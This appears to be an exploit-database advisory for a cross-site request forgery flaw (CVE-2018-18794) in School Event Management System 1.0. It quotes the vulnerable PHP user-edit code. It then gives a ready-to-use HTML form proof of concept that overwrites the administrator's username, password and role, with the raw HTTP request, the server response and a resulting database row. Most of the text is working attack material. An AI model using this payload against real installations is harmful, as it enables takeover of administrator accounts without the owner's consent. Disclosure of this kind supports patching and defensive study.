School Event Management System 1.0 Cross Site Request Forgery

2018.10.30
Credit: Ihsan Sencan
Risk: Low
Local: No
Remote: Yes
CWE: CWE-352

# Exploit Title: School Event Management System 1.0 - Cross-Site Request Forgery (Update Admin) # Dork: N/A # Date: 2018-10-29 # Exploit Author: Ihsan Sencan # Vendor Homepage: https://www.sourcecodester.com/users/janobe # Software Link: https://www.sourcecodester.com/sites/default/files/download/janobe/sems_1.zip # Version: 1.0 # Category: Webapps # Tested on: WiN7_x64/KaLiLinuX_x64 # CVE: CVE-2018-18794 # POC: # 1) # .../[PATH]user/user/edit.php #02 if (!isset($_SESSION['ACCOUNT_ID'])){ #03 redirect(web_root."index.php"); #04 } #05 #06 @$USERID = $_GET['id']; #07 if($USERID==''){ #08 redirect("index.php"); #09 } #10 $user = New User(); #11 $singleuser = $user->single_user($USERID); # .../[PATH]user/controller.php #80 $user = New User(); #81 $user->ACCOUNT_NAME = $_POST['U_NAME']; #82 $user->ACCOUNT_USERNAME = $_POST['U_USERNAME']; #83 $user->ACCOUNT_PASSWORD =sha1($_POST['U_PASS']); #84 $user->ACCOUNT_TYPE = $_POST['U_ROLE']; #85 $user->update($_POST['USERID']); #86 #87 message("[". $_POST['U_NAME'] ."] has been updated!", "success"); #88 redirect("index.php"); # ... <html> <body> <form action="http://localhost/[PATH]/user/controller.php?action=edit" method="POST"> <input id="USERID" name="USERID" placeholder="Account Id" type="Hidden" value="1"> <input name="U_NAME" placeholder="Account Name" type="text" value="admin"> <input name="deptid" type="hidden" value=""> <input name="U_USERNAME" placeholder="Username" type="text" value="admin"> <input name="deptid" type="hidden" value=""> <input name="U_PASS" placeholder="Account Password" type="Password" value=""> <input name="deptid" type="hidden" value=""> <input id="RU_PASS" name="RU_PASS" placeholder="Re-type Password" type="Password" value=""> <select name="U_ROLE" id="U_ROLE"> <option value="Administrator">Administrator</option> <option value="SSG">SSG</option> </select> <button id="save" name="save" type="submit">Save</button> </body> </html> POST /[PATH]/user/controller.php?action=edit HTTP/1.1 Host: 192.168.1.27 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=mrht5eahsjgrpgldk6c455ncm3 Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 136 USERID=1&U_NAME=admin_test&deptid=&U_USERNAME=admin_test&deptid=&U_PASS=admin_test&deptid=&RU_PASS=admin_test&U_ROLE=Administrator&save= HTTP/1.1 200 OK Date: Sun, 28 Oct 2018 17:57:48 GMT Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 X-Powered-By: PHP/5.6.30 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 128 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 /* `exploitdb`.`useraccounts` */ $useraccounts = array( array('ACCOUNT_ID' => '1','ACCOUNT_NAME' => 'admin_test','ACCOUNT_USERNAME' => 'admin_test','ACCOUNT_PASSWORD' => '3f72bcb53fb301af20d78d152456d901c30a43b3','ACCOUNT_TYPE' => 'Administrator','EMPID' => '1234','USERIMAGE' => 'photos/import2.png') );


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top